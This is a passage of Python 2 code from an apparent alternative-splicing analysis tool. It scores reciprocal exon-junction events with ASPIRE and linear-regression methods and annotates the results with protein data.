        for probeset in exon_db:
            initial_proceed = 'no'; original_probeset = probeset
            if probeset in probeset_aligning_protein_db: initial_proceed = 'yes'
            elif array_type == 'AltMouse' or ((array_type == 'junction' or array_type == 'RNASeq') and explicit_data_type == 'null'):
                if '|' in probeset[0]: probeset1 = string.split(probeset[0],'|')[0]; probeset = probeset1,probeset[1]
                try: alternate_probeset_id = exon_db[probeset].InclusionLookup(); probeset = alternate_probeset_id,probeset[1]
                except Exception: null=[]
                probeset_joined = string.join(probeset,'|')
                #print [probeset_joined],[probeset]
                if probeset_joined in probeset_aligning_protein_db: initial_proceed = 'yes'; probeset = probeset_joined
                elif probeset[0] in probeset_aligning_protein_db: initial_proceed = 'yes'; probeset = probeset[0]
                elif probeset[1] in probeset_aligning_protein_db: initial_proceed = 'yes'; probeset = probeset[1]
                #else: for i in probeset_aligning_db: print [i];kill
            if initial_proceed == 'yes':
                protein_data_list=probeset_aligning_protein_db[probeset]
                new_protein_list = []
                gene = exon_db[original_probeset].GeneID()
                for protein_data in protein_data_list:
                    protein_info,call = string.split(protein_data,'|')
                    if 'AA:' in protein_info:
                        ### Parse '...(null_protein)...(hit_protein)...' by turning both brackets into a common delimiter
                        protein_info_r = string.replace(protein_info,')','*')
                        protein_info_r = string.replace(protein_info_r,'(','*')
                        protein_info_r = string.split(protein_info_r,'*')
                        null_protein = protein_info_r[1]; hit_protein = protein_info_r[3]
                        probeset_protein_associations[original_probeset] = null_protein,hit_protein,call
                        protein_db[null_protein] = []; protein_db[hit_protein] = []
                    new_protein_list.append((protein_info,call))
                    #new_protein_list = string.join(new_domain_list,', ')
                protein_functional_attribute_db[gene,original_probeset] = new_protein_list
        filename = 'AltDatabase/'+species+'/'+array_type+'/SEQUENCE-protein-dbase_'+comp_type+'.txt'
        filename=getExonVersionFilename(filename)
        protein_seq_db = importGenericFiltered(filename,protein_db)
        for key in protein_functional_attribute_db:
            gene,probeset = key
            try:
                null_protein,hit_protein,call = probeset_protein_associations[probeset]
                null_seq = protein_seq_db[null_protein][0]; hit_seq = protein_seq_db[hit_protein][0]
                seq_attr = 'sequence: ' +'('+null_protein+')'+null_seq +' -> '+'('+hit_protein+')'+hit_seq
                protein_functional_attribute_db[key].append((seq_attr,call))
            except KeyError: null=[]
        protein_seq_db=[]; probeset_aligning_protein_db=[]
        return gene_protein_ft_db,domain_gene_count_db,protein_functional_attribute_db
    else:
        probeset_aligning_protein_db=[]; len_gene_protein_ft_db = len(gene_protein_ft_db); gene_protein_ft_db=[]
        return len_gene_protein_ft_db,domain_gene_count_db
class SimpleJunctionData:
    """Lightweight container for a reciprocal junction: an inclusion/exclusion
    probeset pair for one gene plus the critical exons distinguishing them."""
    def __init__(self, geneid, probeset1, probeset2, probeset1_display, critical_exon_list):
        self._geneid = geneid
        self._probeset1 = probeset1
        self._probeset2 = probeset2
        self._probeset1_display = probeset1_display
        self._critical_exon_list = critical_exon_list
    def GeneID(self):
        return self._geneid
    def Probeset1(self):
        return self._probeset1
    def Probeset2(self):
        return self._probeset2
    def InclusionDisplay(self):
        ### Original (possibly agglomerated, pipe-delimited) inclusion probeset string
        return self._probeset1_display
    def CriticalExons(self):
        return self._critical_exon_list
    def setSplicingCall(self, splicing_call):
        ### Stored as provided; historically derived via EvidenceOfAltSplicing
        self._splicing_call = splicing_call
    def SplicingCall(self):
        return self._splicing_call
    def setSymbol(self, symbol):
        self.symbol = symbol
    def Symbol(self):
        return self.symbol
    def setInclusionLookup(self, incl_junction_probeset):
        ### Source junction ID from which an exon ID was derived (RNASeq exon-vs-junction case)
        self.incl_junction_probeset = incl_junction_probeset
    def InclusionLookup(self):
        return self.incl_junction_probeset
def formatJunctionData(probesets,affygene,critical_exon_list):
    """Build the (inclusion, exclusion) probeset key and a SimpleJunctionData
    object for one reciprocal-junction event.

    probesets: [inclusion_probeset, exclusion_probeset]; the inclusion entry may
    be a pipe-delimited agglomeration, in which case only the first member is
    used for the key while the full string is kept for display.
    Fix: use str.split instead of string.split - the string-module function was
    removed in Python 3, while the method form behaves identically in Python 2.
    """
    if '|' in probesets[0]: ### Only return the first inclusion probeset (agglomerated probesets)
        incl_probeset = probesets[0].split('|')[0]
    else:
        incl_probeset = probesets[0]
    excl_probeset = probesets[1]
    jd = SimpleJunctionData(affygene,incl_probeset,excl_probeset,probesets[0],critical_exon_list)
    key = incl_probeset,excl_probeset
    return key,jd
class JunctionExpressionData:
    """Constitutive-normalized intensities (log2) for one junction probeset in
    the baseline and experimental groups, with the group-comparison p-value and
    the associated ProbesetExpressionData object."""
    def __init__(self, baseline_norm_exp, exper_norm_exp, pval, ped):
        self.baseline_norm_exp = baseline_norm_exp; self.exper_norm_exp = exper_norm_exp; self.pval = pval; self.ped = ped
    def ConNI(self):
        ### Per-sample control (baseline) normalized intensities in non-log space
        ls=[]
        for i in self.logConNI():
            ls.append(math.pow(2,i))
        return ls
    def ExpNI(self):
        ### Per-sample experimental normalized intensities in non-log space
        ls=[]
        for i in self.logExpNI():
            ls.append(math.pow(2,i))
        return ls
    def ConNIAvg(self): return math.pow(2,statistics.avg(self.logConNI()))
    def ExpNIAvg(self): return math.pow(2,statistics.avg(self.logExpNI()))
    def logConNI(self): return self.baseline_norm_exp
    def logExpNI(self): return self.exper_norm_exp
    def Pval(self): return self.pval
    def ProbesetExprData(self): return self.ped
    def __repr__(self):
        ### BUG FIX: ConNI()/ExpNI() return lists, so the previous
        ### self.ConNI()+'|'+self.ExpNI() raised TypeError (list + str).
        return str(self.ConNI())+'|'+str(self.ExpNI())
def calculateAllASPIREScores(p1,p2):
    """Compute per-sample ASPIRE scores for a reciprocal junction pair.

    For each control sample the sample ratio is compared against the group
    means, and likewise for each experimental sample; the two score lists are
    then compared statistically. Returns (baseline_scores, exp_scores, aspireP).
    """
    con1_avg = p1.ConNIAvg(); con2_avg = p2.ConNIAvg()
    exp1_avg = p1.ExpNIAvg(); exp2_avg = p2.ExpNIAvg()
    original_score = statistics.aspire_stringent(con1_avg,exp1_avg,con2_avg,exp2_avg)
    ### Compare each control ratio to the control-group means
    baseline_scores=[]
    for idx, con1 in enumerate(p1.ConNI()):
        con2 = p2.ConNI()[idx]
        baseline_scores.append(statistics.aspire_stringent(con2,exp2_avg,con1,exp1_avg))
    ### Compare each experimental ratio to the group means
    exp_scores=[]
    for idx, exp1 in enumerate(p1.ExpNI()):
        exp2 = p2.ExpNI()[idx]
        exp_scores.append(statistics.aspire_stringent(con1_avg,exp1,con2_avg,exp2))
    try:
        aspireP = statistics.runComparisonStatistic(baseline_scores,exp_scores,probability_statistic)
    except Exception:
        aspireP = 'NA' ### Occurs when analyzing two groups with no variance
    if aspireP == 1: aspireP = 'NA'
    return baseline_scores, exp_scores, aspireP
def stringListConvert(ls):
    """Return a new list with every element converted to its str() form."""
    return [str(item) for item in ls]
def analyzeJunctionSplicing(nonlog_NI_db):
    """Score reciprocal-junction splicing events (ASPIRE or linear regression).

    For every probeset, per-sample intensities are normalized against the
    gene's constitutive expression; normalized ratios per junction pair are
    then converted to a splice score (dI for ASPIRE, log fold for
    linearregres) and filtered by the user p-value/fold thresholds.
    Relies on many module-level globals (array_raw_group_values, exon_db,
    avg_const_exp_db, alt_junction_db, analysis_method, thresholds, etc.).
    Returns (splice_event_list, probeset_comp_db, permute_p_values,
    excluded_probeset_db).
    """
    group_sizes = []; original_array_indices = permute_lists[0] ###p[0] is the original organization of the group samples prior to permutation
    for group in original_array_indices: group_sizes.append(len(group))
    ### Used to restrict the analysis to a pre-selected set of probesets (e.g. those that have a specifc splicing pattern)
    if len(filtered_probeset_db)>0:
        temp_db={}
        for probeset in nonlog_NI_db: temp_db[probeset]=[]
        for probeset in temp_db:
            try: filtered_probeset_db[probeset]
            except KeyError: del nonlog_NI_db[probeset]
    ### Used to the export relative individual adjusted probesets fold changes used for splicing index values
    if export_NI_values == 'yes':
        global NIdata_export
        summary_output = root_dir+'AltResults/RawSpliceData/'+species+'/'+analysis_method+'/'+dataset_name[:-1]+'.txt'
        NIdata_export = export.ExportFile(summary_output)
        title = string.join(['inclusion-probeset','exclusion-probeset']+original_array_names,'\t')+'\n'; NIdata_export.write(title)
    ### Calculate a probeset p-value adjusted for constitutive expression levels (taken from splicing index method)
    xl=0
    probeset_normIntensity_db={}
    for probeset in array_raw_group_values:
        ed = exon_db[probeset]; geneid = ed.GeneID(); xl+=1
        #if geneid in alt_junction_db and geneid in original_avg_const_exp_db: ### Don't want this filter since it causes problems for Trans-splicing
        group_index = 0; si_interim_group_db={}; ge_threshold_count=0; value_count = 0
        ### Prepare normalized expression lists for recipricol-junction algorithms
        if geneid in avg_const_exp_db:
            for group_values in array_raw_group_values[probeset]:
                value_index = 0; ratio_hash=[]
                for value in group_values: ###Calculate normalized ratio's for each condition and save raw values for later permutation
                    exp_val = value;ge_val = avg_const_exp_db[geneid][value_count]; exp_ratio = exp_val-ge_val
                    ratio_hash.append(exp_ratio); value_index +=1; value_count +=1
                si_interim_group_db[group_index] = ratio_hash
                group_index+=1
            group1_ratios = si_interim_group_db[0]; group2_ratios = si_interim_group_db[1]
            ### Calculate and store simple expression summary stats
            data_list1 = array_raw_group_values[probeset][0]; data_list2 = array_raw_group_values[probeset][1]
            baseline_exp = statistics.avg(data_list1); experimental_exp = statistics.avg(data_list2); fold_change = experimental_exp - baseline_exp
            #group_name1 = array_group_list[0]; group_name2 = array_group_list[1]
            try:
                ttest_exp_p = statistics.runComparisonStatistic(data_list1,data_list2,probability_statistic)
            except Exception: ttest_exp_p = 'NA'
            if ttest_exp_p == 1: ttest_exp_p = 'NA'
            adj_fold = statistics.avg(group2_ratios) - statistics.avg(group1_ratios)
            ped = ProbesetExpressionData(baseline_exp, experimental_exp, fold_change, adj_fold, ttest_exp_p, '')
            try:
                try:
                    normIntensityP = statistics.runComparisonStatistic(group1_ratios,group2_ratios,probability_statistic)
                except Exception:
                    #print group1_ratios,group2_ratios,array_raw_group_values[probeset],avg_const_exp_db[geneid];kill
                    normIntensityP = 'NA' ###occurs for constitutive probesets
            except Exception: normIntensityP = 0
            if normIntensityP == 1: normIntensityP = 'NA'
            ji = JunctionExpressionData(group1_ratios, group2_ratios, normIntensityP, ped)
            probeset_normIntensity_db[probeset]=ji ### store and access this below
            #if probeset == 'G6899622@J916374@j_at': print normIntensityP,group1_ratios,group2_ratios;kill
        ###Concatenate the two raw expression groups into a single list for permutation analysis
        ls_concatenated = []
        for group in array_raw_group_values[probeset]:
            for entry in group: ls_concatenated.append(entry)
        if analysis_method == 'linearregres': ###Convert out of log space
            ls_concatenated = statistics.log_fold_conversion_fraction(ls_concatenated)
        array_raw_group_values[probeset] = ls_concatenated
    s = 0; t = 0; y = ''; denominator_events=0; excluded_probeset_db = {}
    splice_event_list=[]; splice_event_list_mx=[]; splice_event_list_non_mx=[]; event_mx_temp = []; permute_p_values={} #use this to exclude duplicate mx events
    for affygene in alt_junction_db:
        if affygene in original_avg_const_exp_db:
            constit_exp1 = original_avg_const_exp_db[affygene][0]
            constit_exp2 = original_avg_const_exp_db[affygene][1]
            ge_fold=constit_exp2-constit_exp1
            for event in alt_junction_db[affygene]:
                if array_type == 'AltMouse':
                    #event = [('ei', 'E16-E17'), ('ex', 'E16-E18')]
                    #critical_exon_db[affygene,tuple(critical_exons)] = [1,'E'+str(e1a),'E'+str(e2b)] --- affygene,tuple(event) == key, 1 indicates both are either up or down together
                    event_call = event[0][0] + '-' + event[1][0]
                    exon_set1 = event[0][1]; exon_set2 = event[1][1]
                    probeset1 = exon_dbase[affygene,exon_set1]
                    probeset2 = exon_dbase[affygene,exon_set2]
                    critical_exon_list = critical_exon_db[affygene,tuple(event)]
                if array_type == 'junction' or array_type == 'RNASeq':
                    event_call = 'ei-ex' ### Below objects from JunctionArrayEnsemblRules - class JunctionInformation
                    probeset1 = event.InclusionProbeset(); probeset2 = event.ExclusionProbeset()
                    exon_set1 = event.InclusionJunction(); exon_set2 = event.ExclusionJunction()
                    try: novel_event = event.NovelEvent()
                    except Exception: novel_event = 'known'
                    critical_exon_list = [1,event.CriticalExonSets()]
                key,jd = formatJunctionData([probeset1,probeset2],affygene,critical_exon_list[1])
                if array_type == 'junction' or array_type == 'RNASeq':
                    try: jd.setSymbol(annotate_db[affygene].Symbol())
                    except Exception:null=[]
                #if '|' in probeset1: print probeset1, key,jd.InclusionDisplay();kill
                probeset_comp_db[key] = jd ### This is used for the permutation analysis and domain/mirBS import
                #print probeset1,probeset2, critical_exon_list,event_call,exon_set1,exon_set2;kill
                if probeset1 in nonlog_NI_db and probeset2 in nonlog_NI_db:
                    denominator_events+=1
                    try: p1 = probeset_normIntensity_db[probeset1]; p2 = probeset_normIntensity_db[probeset2]
                    except Exception:
                        print probeset1, probeset2
                        p1 = probeset_normIntensity_db[probeset1]
                        p2 = probeset_normIntensity_db[probeset2]
                    #if '|' in probeset1: print
                    pp1 = p1.Pval(); pp2 = p2.Pval()
                    baseline_ratio1 = p1.ConNIAvg()
                    experimental_ratio1 = p1.ExpNIAvg()
                    baseline_ratio2 = p2.ConNIAvg()
                    experimental_ratio2 = p2.ExpNIAvg()
                    ped1 = p1.ProbesetExprData()
                    ped2 = p2.ProbesetExprData()
                    Rin = ''; Rex = ''
                    r = 0 ###Variable used to determine if we should take the absolute value of dI for mutually exlcusive events
                    if event_call == 'ei-ex': #means probeset1 is an exon inclusion and probeset2 is an exon exclusion
                        Rin = baseline_ratio1/experimental_ratio1 # Rin=A/C
                        Rex = baseline_ratio2/experimental_ratio2 # Rin=B/D
                        I1=baseline_ratio1/(baseline_ratio1+baseline_ratio2)
                        I2=experimental_ratio1/(experimental_ratio1+experimental_ratio2)
                        ###When Rex is larger, the exp_ratio for exclusion is decreased in comparison to baseline.
                        ###Thus, increased inclusion (when Rin is small, inclusion is big)
                        if (Rin>1 and Rex<1): y = 'downregulated'
                        elif (Rin<1 and Rex>1): y = 'upregulated'
                        elif (Rex<Rin): y = 'downregulated'
                        else: y = 'upregulated'
                    temp_list = []
                    if event_call == 'mx-mx':
                        temp_list.append(exon_set1); temp_list.append(exon_set2);temp_list.sort()
                        if (affygene,temp_list) not in event_mx_temp: #use this logic to prevent mx entries being added more than once
                            event_mx_temp.append((affygene,temp_list))
                            ###Arbitrarily choose which exon-set will be Rin or Rex, does matter for mutually exclusive events
                            Rin = baseline_ratio1/experimental_ratio1 # Rin=A/C
                            Rex = baseline_ratio2/experimental_ratio2 # Rin=B/D
                            I1=baseline_ratio1/(baseline_ratio1+baseline_ratio2)
                            I2=experimental_ratio1/(experimental_ratio1+experimental_ratio2)
                            y = 'mutually-exclusive'; r = 1
                    if analysis_method == 'ASPIRE' and Rex != '':
                        #if affygene == 'ENSMUSG00000000126': print Rin, Rex, probeset1, probeset2
                        if (Rin>1 and Rex<1) or (Rin<1 and Rex>1):
                            s +=1
                            in1=((Rex-1.0)*Rin)/(Rex-Rin); in2=(Rex-1.0)/(Rex-Rin)
                            dI = ((in2-in1)+(I2-I1))/2.0 #modified to give propper exon inclusion
                            dI = dI*(-1) ### Reverse the fold to make equivalent to splicing-index and FIRMA scores
                            try: baseline_scores, exp_scores, aspireP = calculateAllASPIREScores(p1,p2)
                            except Exception: baseline_scores = [0]; exp_scores=[dI]; aspireP = 0
                            if export_NI_values == 'yes':
                                baseline_scores = stringListConvert(baseline_scores); exp_scores = stringListConvert(exp_scores)
                                ev = string.join([probeset1,probeset2]+baseline_scores+exp_scores,'\t')+'\n'; NIdata_export.write(ev)
                            if max_replicates >2 or equal_replicates==2:
                                permute_p_values[(probeset1,probeset2)] = [aspireP, 'NA', 'NA', 'NA']
                            if r == 1: dI = abs(dI) ###Occurs when event is mutually exclusive
                            #if abs(dI)>alt_exon_logfold_cutoff: print [dI],pp1,pp2,aspireP;kill
                            #print [affygene,dI,pp1,pp2,aspireP,event.CriticalExonSets(),probeset1,probeset2,alt_exon_logfold_cutoff,p_threshold]
                            if ((pp1<p_threshold or pp2<p_threshold) or pp1==1 or pp1=='NA') and abs(dI) > alt_exon_logfold_cutoff: ###Require that the splice event have a constitutive corrected p less than the user defined threshold
                                ejd = ExonJunctionData(dI,probeset1,probeset2,pp1,pp2,y,event_call,critical_exon_list,affygene,ped1,ped2)
                                """if probeset1 == 'ENSMUSG00000033335:E16.1-E17.1' and probeset2 == 'ENSMUSG00000033335:E16.1-E19.1':
                                print [dI,pp1,pp2,p_threshold,alt_exon_logfold_cutoff]
                                print baseline_scores, exp_scores, [aspireP]#;sys.exit()"""
                                ejd.setConstitutiveExpression(constit_exp1); ejd.setConstitutiveFold(ge_fold)
                                if perform_permutation_analysis == 'yes': splice_event_list.append((dI,ejd))
                                elif aspireP < permute_p_threshold or aspireP=='NA': splice_event_list.append((dI,ejd))
                                #if abs(dI)>.2: print probeset1, probeset2, critical_exon_list, [exon_set1], [exon_set2]
                                #if dI>.2 and aspireP<0.05: print baseline_scores,exp_scores,aspireP, statistics.avg(exp_scores), dI
                            elif array_type == 'junction' or array_type == 'RNASeq':
                                excluded_probeset_db[affygene+':'+event.CriticalExonSets()[0]] = probeset1, affygene, dI, 'NA', aspireP
                            if array_type == 'RNASeq':
                                try: ejd.setNovelEvent(novel_event)
                                except Exception: None
                    if analysis_method == 'linearregres' and Rex != '':
                        s+=1
                        log_fold,linregressP,rsqrd_status = getLinearRegressionScores(probeset1,probeset2,group_sizes)
                        log_fold = log_fold ### Reverse the fold to make equivalent to splicing-index and FIRMA scores
                        if max_replicates >2 or equal_replicates==2: permute_p_values[(probeset1,probeset2)] = [linregressP, 'NA', 'NA', 'NA']
                        if rsqrd_status == 'proceed':
                            if ((pp1<p_threshold or pp2<p_threshold) or pp1==1 or pp1=='NA') and abs(log_fold) > alt_exon_logfold_cutoff: ###Require that the splice event have a constitutive corrected p less than the user defined threshold
                                ejd = ExonJunctionData(log_fold,probeset1,probeset2,pp1,pp2,y,event_call,critical_exon_list,affygene,ped1,ped2)
                                ejd.setConstitutiveExpression(constit_exp1); ejd.setConstitutiveFold(ge_fold)
                                if perform_permutation_analysis == 'yes': splice_event_list.append((log_fold,ejd))
                                elif linregressP < permute_p_threshold: splice_event_list.append((log_fold,ejd))
                                #if probeset1 == 'G6990053@762121_762232_at' and probeset2 == 'G6990053@J926254@j_at':
                                #print event_call, critical_exon_list,affygene, Rin, Rex, y, temp_list;kill
                            elif array_type == 'junction' or array_type == 'RNASeq':
                                excluded_probeset_db[affygene+':'+event.CriticalExonSets()[0]] = probeset1, affygene, log_fold, 'NA', linregressP
                            if array_type == 'RNASeq':
                                try: ejd.setNovelEvent(novel_event)
                                except Exception: None
        else: t +=1
    clearObjectsFromMemory(probeset_normIntensity_db)
    probeset_normIntensity_db={}; ### Potentially large memory object containing summary stats for all probesets
    statistics.adjustPermuteStats(permute_p_values)
    summary_data_db['denominator_exp_events']=denominator_events
    print "Number of exon-events analyzed:", s
    print "Number of exon-events excluded:", t
    return splice_event_list, probeset_comp_db, permute_p_values, excluded_probeset_db
def maxReplicates():
    """Estimate replicate counts from the module-level array_raw_group_values.

    Only the first probeset's group structure is inspected (both loops break
    after the first iteration). Returns (max_replicates, equal_replicates)
    where equal_replicates is the common group size when all groups match,
    otherwise 0.
    """
    total_values = 0; groups_over_two = 0; groups_over_one = 0; observed_sizes = []
    for probeset in array_raw_group_values:
        for group_values in array_raw_group_values[probeset]:
            try:
                size = len(group_values)
                total_values += size
                observed_sizes.append(size)
                if size > 2:
                    groups_over_two += 1
                elif size > 1:
                    groups_over_one += 1
            except Exception:
                ### Values are not grouped into per-group lists - count directly
                total_values += len(array_raw_group_values[probeset]); break
        break  ### the first probeset is representative
    observed_sizes = unique.unique(observed_sizes)
    if len(observed_sizes) == 1:
        equal_replicates = observed_sizes[0]
    else:
        equal_replicates = 0
    max_replicates = total_values/float(original_conditions)
    if max_replicates < 2.01:
        ### Mixed group sizes around 2 still permit permutation analysis
        if groups_over_two > 0 and groups_over_one > 0:
            max_replicates = 3
    return max_replicates, equal_replicates
def furtherProcessJunctionScores(splice_event_list, probeset_comp_db, permute_p_values):
    """Post-process scored junction events: optional permutation analysis,
    p-value-method labeling, optional filtering for evidence of alternative
    splicing, and annotation of the comparison databases with splicing calls.

    Uses module-level globals (perform_permutation_analysis, max_replicates,
    equal_replicates, probability_statistic, analysis_method, filter_for_AS,
    array_type, alt_junction_db). Returns (new_splice_event_list,
    p_value_call, permute_p_values, probeset_comp_db,
    regulated_exon_junction_db).
    """
    splice_event_list.sort(); splice_event_list.reverse()
    print "filtered %s scores:" % analysis_method, len(splice_event_list)
    if perform_permutation_analysis == 'yes':
        ###*********BEGIN PERMUTATION ANALYSIS*********
        if max_replicates >2 or equal_replicates==2:
            splice_event_list, p_value_call, permute_p_values = permuteSplicingScores(splice_event_list)
        else:
            print "WARNING...Not enough replicates to perform permutation analysis."
            p_value_call=''; permute_p_values = {}
    else:
        ### No permutation: label p-values with the comparison statistic used
        if max_replicates >2 or equal_replicates==2:
            if probability_statistic == 'unpaired t-test':
                p_value_call=analysis_method+'-OneWayAnova'
            else:
                p_value_call=analysis_method+'-'+probability_statistic
        else:
            if probability_statistic == 'unpaired t-test':
                p_value_call='OneWayAnova'; permute_p_values = {}
            else:
                p_value_call=probability_statistic; permute_p_values = {}
    print len(splice_event_list), 'alternative events after subsequent filtering (optional)'
    ### Get ExonJunction annotaitons
    junction_splicing_annot_db = getJunctionSplicingAnnotations(probeset_comp_db)
    regulated_exon_junction_db={}; new_splice_event_list=[]
    if filter_for_AS == 'yes': print "Filtering for evidence of Alternative Splicing"
    for (fold,ejd) in splice_event_list:
        proceed = 'no'
        if filter_for_AS == 'yes':
            try:
                ja = junction_splicing_annot_db[ejd.Probeset1(),ejd.Probeset2()]; splicing_call = ja.SplicingCall()
                if splicing_call == 1: proceed = 'yes'
            except KeyError: proceed = 'no'
        else: proceed = 'yes'
        if proceed == 'yes':
            key,jd = formatJunctionData([ejd.Probeset1(),ejd.Probeset2()],ejd.GeneID(),ejd.CriticalExons())
            regulated_exon_junction_db[key] = jd ### This is used for the permutation analysis and domain/mirBS import
            new_splice_event_list.append((fold,ejd))
            ### Add junction probeset lookup for reciprocal junctions composed of an exonid (not in protein database currently)
            if array_type == 'RNASeq' and '-' not in key[0]: ### Thus, it is an exon compared to a junction
                events = alt_junction_db[ejd.GeneID()]
                for ji in events:
                    if (ji.InclusionProbeset(),ji.ExclusionProbeset()) == key:
                        jd.setInclusionLookup(ji.InclusionLookup()) ### This is the source junction from which the exon ID comes from
                        probeset_comp_db[ji.InclusionLookup(),ji.ExclusionProbeset()]=jd
                        #print ji.InclusionProbeset(),ji.ExclusionProbeset(),' ',ji.InclusionLookup()
    if filter_for_AS == 'yes': print len(new_splice_event_list), "remaining after filtering for evidence of Alternative splicing"
    filtered_exon_db = {}
    for junctions in probeset_comp_db:
        rj = probeset_comp_db[junctions] ### Add splicing annotations to the AltMouse junction DBs (needed for permutation analysis statistics and filtering)
        try: ja = junction_splicing_annot_db[junctions]; splicing_call = ja.SplicingCall(); rj.setSplicingCall(ja.SplicingCall())
        except KeyError: rj.setSplicingCall(0)
        if filter_for_AS == 'yes': filtered_exon_db[junctions] = rj
    for junctions in regulated_exon_junction_db:
        rj = regulated_exon_junction_db[junctions]
        try: ja = junction_splicing_annot_db[junctions]; rj.setSplicingCall(ja.SplicingCall())
        except KeyError: rj.setSplicingCall(0)
    if filter_for_AS == 'yes': probeset_comp_db = filtered_exon_db
    try: clearObjectsFromMemory(alt_junction_db)
    except Exception: null=[]
    return new_splice_event_list, p_value_call, permute_p_values, probeset_comp_db, regulated_exon_junction_db
class SplicingScoreData:
    """Base class for splicing results; subclasses populate the underscore
    attributes in their constructors. Provides read accessors plus setters for
    attributes filled in after construction (constitutive stats, novel-event
    flag, expression data)."""
    def Method(self):
        ###e.g. ASPIRE
        return self._method
    def Score(self): return str(self._score)
    def Probeset1(self): return self._probeset1
    def Probeset2(self): return self._probeset2
    def RegulationCall(self): return self._regulation_call
    def GeneID(self): return self._geneid
    def CriticalExons(self): return self._critical_exon_list[1]
    def CriticalExonTuple(self): return self._critical_exon_list
    def TTestNormalizedRatios(self): return self._normIntensityP
    def TTestNormalizedRatios2(self): return self._normIntensityP2
    def setConstitutiveFold(self,exp_log_ratio): self._exp_log_ratio = exp_log_ratio
    def ConstitutiveFold(self): return str(self._exp_log_ratio)
    def setConstitutiveExpression(self,const_baseline): self.const_baseline = const_baseline
    def ConstitutiveExpression(self): return str(self.const_baseline)
    def setProbesetExpressionData(self,ped): self.ped1 = ped
    def ProbesetExprData1(self): return self.ped1
    def ProbesetExprData2(self): return self.ped2
    def setNovelEvent(self,novel_event): self._novel_event = novel_event
    def NovelEvent(self): return self._novel_event
    def EventCall(self):
        ###e.g. Exon inclusion (ei) Exon exclusion (ex), ei-ex, reported in that direction
        return self._event_call
    def Report(self):
        ### Pipe-delimited summary: method|gene|critical exons.
        ### str.join replaces string.join (removed in Python 3); behavior identical in Python 2.
        output = self.Method() +'|'+ self.GeneID() +'|'+ '|'.join(self.CriticalExons())
        return output
    def __repr__(self): return self.Report()
class ExonJunctionData(SplicingScoreData):
    """Reciprocal-junction splicing result (one inclusion/exclusion probeset
    pair) scored by the active algorithm."""
    def __init__(self,score,probeset1,probeset2,probeset1_p,probeset2_p,regulation_call,event_call,critical_exon_list,affygene,ped1,ped2):
        self._score = score
        self._probeset1 = probeset1
        self._probeset2 = probeset2
        self._regulation_call = regulation_call
        self._event_call = event_call
        self._critical_exon_list = critical_exon_list
        self._geneid = affygene
        self._method = analysis_method  # module-level global naming the active algorithm
        self._normIntensityP = probeset1_p
        self._normIntensityP2 = probeset2_p
        self.ped1 = ped1
        self.ped2 = ped2
class ExonData(SplicingScoreData):
    """Splicing-index style result for a single probeset."""
    def __init__(self,splicing_index,probeset,critical_exon_list,geneid,group1_ratios,group2_ratios,normIntensityP,opposite_SI_log_mean):
        self._score = splicing_index
        self._probeset1 = probeset
        self._opposite_SI_log_mean = opposite_SI_log_mean
        self._critical_exon_list = critical_exon_list
        self._geneid = geneid
        self._baseline_ratio1 = group1_ratios
        self._experimental_ratio1 = group2_ratios
        self._normIntensityP = normIntensityP
        self._method = analysis_method  # module-level global naming the active algorithm
        self._event_call = 'exon-inclusion'
        ### Baseline is the numerator ratio, so a positive index means downregulation
        if splicing_index > 0:
            self._regulation_call = 'downregulated'
        else:
            self._regulation_call = 'upregulated'
    def OppositeSIRatios(self):
        return self._opposite_SI_log_mean
class ExcludedExonData(ExonData):
    """Minimal ExonData variant holding only the score, gene and p-value for
    probesets excluded from the main results."""
    def __init__(self,splicing_index,geneid,normIntensityP):
        self._score = splicing_index
        self._geneid = geneid
        self._normIntensityP = normIntensityP
def getAllPossibleLinearRegressionScores(probeset1,probeset2,positions,group_sizes):
    """Score every ordered pairwise group comparison for two probesets and
    return the largest absolute linear-regression fold with its group indices.

    positions is a list of (start, end) sample-index spans, one per group.
    Expression values come from the module-level array_raw_group_values.
    """
    exp1 = array_raw_group_values[probeset1]
    exp2 = array_raw_group_values[probeset2]
    scored_comparisons = []
    for index1, (start_a,end_a) in enumerate(positions):
        for index2, (start_b,end_b) in enumerate(positions):
            if start_a != start_b:
                first_p1 = exp1[start_a:end_a]; second_p1 = exp1[start_b:end_b]
                first_p2 = exp2[start_a:end_a]; second_p2 = exp2[start_b:end_b]
                log_fold, rsqrd = performLinearRegression(first_p1,first_p2,second_p1,second_p2)
                ### Orient indices so every recorded score indicates upregulation
                if log_fold < 0:
                    scored_comparisons.append((abs(log_fold),index2,index1))
                else:
                    scored_comparisons.append((abs(log_fold),index1,index2))
    if scored_comparisons:
        best_fold, best_i1, best_i2 = max(scored_comparisons)
    else:
        best_fold = 0; best_i1 = 0; best_i2 = 0
    return best_fold, best_i1, best_i2
def getLinearRegressionScores(probeset1,probeset2,group_sizes):
    """Two-group linear-regression splice score for a probeset pair.

    Splits each probeset's values (from the module-level
    array_raw_group_values) at group_sizes[0] into baseline/experimental
    groups and delegates to getAllLinearRegressionScores.
    Returns (log_fold, linregressP, rsqrd).
    """
    ### Get Raw expression values for the two probests
    p1_exp = array_raw_group_values[probeset1]
    p2_exp = array_raw_group_values[probeset2]
    try:
        p1_g1 = p1_exp[:group_sizes[0]]; p1_g2 = p1_exp[group_sizes[0]:]
        p2_g1 = p2_exp[:group_sizes[0]]; p2_g2 = p2_exp[group_sizes[0]:]
    except Exception:
        ### Diagnostic dump; force_kill is an undefined name, deliberately aborting with NameError
        print probeset1,probeset2
        print p1_exp
        print p2_exp
        print group_sizes
        force_kill
    log_fold, linregressP, rsqrd = getAllLinearRegressionScores(probeset1,probeset2,p1_g1,p2_g1,p1_g2,p2_g2,2)
    return log_fold, linregressP, rsqrd
def getAllLinearRegressionScores(probeset1,probeset2,p1_g1,p2_g1,p1_g2,p2_g2,groups):
    """Linear-regression splice score for a probeset pair plus a p-value.

    The overall fold compares the experimental slope to the baseline slope;
    a per-sample score distribution for each group (each sample regressed
    against the baseline group) feeds the comparison statistic.
    Fix: '\\t'.join replaces string.join (removed in Python 3); output is
    byte-identical in Python 2.
    Returns (log_fold, linregressP, rsqrd).
    """
    log_fold, rsqrd = performLinearRegression(p1_g1,p2_g1,p1_g2,p2_g2)
    try:
        ### Repeat for each sample versus baselines to calculate a p-value
        index=0; group1_scores=[]
        for p1_g1_sample in p1_g1:
            p2_g1_sample = p2_g1[index]
            log_f, rs = performLinearRegression(p1_g1,p2_g1,[p1_g1_sample],[p2_g1_sample])
            group1_scores.append(log_f); index+=1
        index=0; group2_scores=[]
        for p1_g2_sample in p1_g2:
            p2_g2_sample = p2_g2[index]
            log_f, rs = performLinearRegression(p1_g1,p2_g1,[p1_g2_sample],[p2_g2_sample])
            group2_scores.append(log_f); index+=1
        try:
